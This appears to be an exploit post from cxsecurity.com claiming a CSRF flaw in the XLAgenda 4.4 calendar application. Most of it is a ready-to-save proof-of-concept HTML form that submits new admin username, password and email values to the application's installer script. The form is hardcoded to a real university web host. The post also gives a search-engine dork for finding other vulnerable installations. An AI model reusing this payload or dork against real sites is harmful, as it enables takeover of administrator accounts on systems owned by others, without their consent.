XLAgenda 4.4 CSRF Vulnerability

2019.02.13
dz indoushka (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : XLAgenda 4.4 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : https://xavier.lequere.net/xlagenda/ | | # Dork : "Propulsé par XLAgenda 4.4" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Save Code as poc.html [+] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>XLAgenda 4.4 | Installation</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex, nofollow" /> <link href="style.css" rel="stylesheet" type="text/css" /> </head> <body> <h1>Installation - Etape 2/3</h1> <p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p> <form name="form1" method="post" action="http://chs.univ-paris1.fr/xlagenda44/install/install2.php"> <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3> <p> <label for="user">Nom d'utilisateur :</label><br> <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br> (20 caractères maximum) </p> <p> <label for="pass">Mot de passe :</label><br> <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br> (6 à 15 caractères) </p> <p> <label for="pass2">Introduisez à nouveau le mot de passe :</label><br> <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> * </p> <p> <label for="nom">Nom :</label><br> <input name="nom" type="text" id="nom" value="" size="30" /> </p> <p> <label for="prenom">Prénom :</label><br> <input name="prenom" type="text" id="prenom" value="" size="30" /> </p> <p> <label for="email">Adresse email :</label><br> <input name="email" type="text" id="email" value="" size="30" /> * </p> <p> Les champs marqués d'un * sont obligatoires.<br> Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié. </p> <p style="text-align:center;"> <input type="submit" name="Submit" value="Continuer >>" /> </p> </form></body> </html> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top